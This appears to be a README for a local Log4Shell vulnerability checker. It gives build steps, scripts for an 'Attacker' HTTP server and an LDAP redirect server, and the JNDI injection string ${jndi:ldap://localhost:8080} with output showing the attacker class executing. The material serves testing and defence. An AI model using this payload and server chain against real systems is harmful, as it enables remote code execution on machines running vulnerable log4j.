log4j2-vulnerability-checker
A local server that validates the log4j2 vulnerability "Log4Shell".
Do it on the same linux machine as the application you want to verify:
# Get this repository
git clone [email protected]:MirrgieRiana/log4j2-vulnerability-checker.git
cd log4j2-vulnerability-checker
# Compile
bash gradlew installDist
Launch the following commands in another window at the same time.
This launches a HTTP server that distributes an Attacker Class File:
bash http.sh 8081
This launches an LDAP server that redirects to the "Attacker HTTP Server":
bash ldap.sh 8080 8081
By some ways, log the following string:
<<< ${jndi:ldap://localhost:8080} >>>
The string Attacker static init!
is output to the stdout, stderr and logger.
Running Jibaku will cause the vulnerability.
$ bash jibaku.sh
Attacker static init!
Attacker static init!
21:11:55.154 [main] ERROR Jibaku - <<< ${jndi:ldap://localhost:8080} >>>